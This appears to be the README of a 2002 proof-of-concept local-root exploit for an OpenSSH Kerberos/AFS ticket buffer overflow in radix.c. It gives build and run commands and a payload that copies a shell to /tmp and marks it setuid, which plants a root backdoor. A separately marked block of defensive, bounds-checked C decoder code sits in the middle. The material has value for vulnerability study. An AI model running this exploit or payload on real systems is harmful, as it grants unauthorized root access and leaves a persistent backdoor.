
- THIS IS A PROOF OF CONCEPT EXPLOIT -
- 10/04/2002 -
- Marcell Fodor e-mail: m.fodor@mail.datanet.hu -


 exploit code against OpenSSH 2.2.0 - 3.1.0 servers

 
 effect:

	local root

 vulnerable services:

	-pass Kerberos IV TGT
	-pass AFS Token

 bug details:

	radix.c
	The GETSTRING macro in the radix_to_creds() function can overflow fixed-size buffers.
	affected buffers:

	    creds->service
	    creds->instance
	    creds->realm
	    creds->pinst
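The defect class described above is a length-prefixed string decoder that copies a field into a fixed-size buffer without comparing the field's length to the buffer's size. The following is an added illustration, not code from OpenSSH's radix.c or from this exploit: a hypothetical decoder for the same four fields in which every length is validated against both the remaining input and the destination buffer before anything is copied. The struct layout, the 40-byte field size, the one-byte length prefix and all function names are assumptions for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical credential record; the field size is assumed, not OpenSSH's. */
#define FIELD_SIZE 40

struct creds_example {
    char service[FIELD_SIZE];
    char instance[FIELD_SIZE];
    char realm[FIELD_SIZE];
    char pinst[FIELD_SIZE];
};

/* Decodes one length-prefixed string: first byte is the length, then the
 * bytes. Returns the number of input bytes consumed, or 0 on any bounds
 * violation. The length is checked against BOTH the remaining input and
 * the destination buffer; the second check is the one whose absence lets
 * an overlong field overwrite memory past the buffer. */
static size_t get_string_checked(const uint8_t *in, size_t in_len,
                                 char *dst, size_t dst_size)
{
    if (in_len < 1)
        return 0;
    size_t n = in[0];
    if (n + 1 > in_len)        /* would read past the end of the input */
        return 0;
    if (n >= dst_size)         /* would not fit together with the NUL */
        return 0;
    memcpy(dst, in + 1, n);
    dst[n] = '\0';
    return n + 1;
}

/* Decodes the four fields in order. Returns 1 on success, 0 if any field
 * is missing, truncated, or too long for its buffer; on failure the
 * caller must treat the whole record as invalid. */
int decode_creds_checked(const uint8_t *in, size_t in_len,
                         struct creds_example *c)
{
    char *fields[4] = { c->service, c->instance, c->realm, c->pinst };
    size_t off = 0;
    for (int i = 0; i < 4; i++) {
        size_t used = get_string_checked(in + off, in_len - off,
                                         fields[i], FIELD_SIZE);
        if (used == 0)
            return 0;
        off += used;
    }
    return 1;
}

/* Builds a constructed sample record, each field encoded as [len][bytes],
 * so the decoder can be exercised offline. Returns the number of bytes
 * written, or 0 if a field exceeds 255 bytes or the output is too small. */
size_t build_sample(uint8_t *out, size_t out_size,
                    const char *svc, const char *inst,
                    const char *realm, const char *pinst)
{
    const char *f[4] = { svc, inst, realm, pinst };
    size_t off = 0;
    for (int i = 0; i < 4; i++) {
        size_t n = strlen(f[i]);
        if (n > 255 || off + 1 + n > out_size)
            return 0;
        out[off++] = (uint8_t)n;
        memcpy(out + off, f[i], n);
        off += n;
    }
    return off;
}
```

A record whose realm field is longer than FIELD_SIZE - 1 bytes is rejected by decode_creds_checked() before any copy happens, which is exactly the case the unchecked macro mishandles; a record cut off mid-field is rejected for the same reason by the input-length check.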

 exploit code:
 
	-requires the GNU MP Library: ftp://ftp.gnu.org/gnu/gmp
	-make
	-./tgt 127.0.0.1 <user> <password>

 egg:

	includes/egg.h
	
	    cp /bin/ash /tmp/ash
	    chmod 4755 /tmp/ash